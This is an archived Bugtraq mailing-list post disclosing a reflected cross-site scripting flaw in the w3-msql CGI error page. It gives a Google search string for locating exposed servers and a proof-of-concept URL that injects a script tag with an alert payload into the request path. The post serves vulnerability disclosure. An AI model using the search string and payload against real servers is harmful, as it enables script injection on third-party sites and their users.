
Mailing List Archive: Bugtraq: Bugtraq

xss in w3-msql error page

 

 



vivek_infosec at yahoo

Jan 3, 2008, 6:11 AM


A reflected XSS flaw exists in the w3-msql error page.

Google dork: "W3-mSQL Error! - Can't stat script file (/"

Just insert a script from the start of /

Like if you get a URL like:

http://localhost/cgi-bin/w3-msql/journal/ijcd/index.html

and the error page output is:

W3-mSQL Error! - Can't stat script file (/journal/ijcd/index.html)

you can try this:


http://localhost/cgi-bin/w3-msql/<script>alert('xss')</script>

to confirm the issue
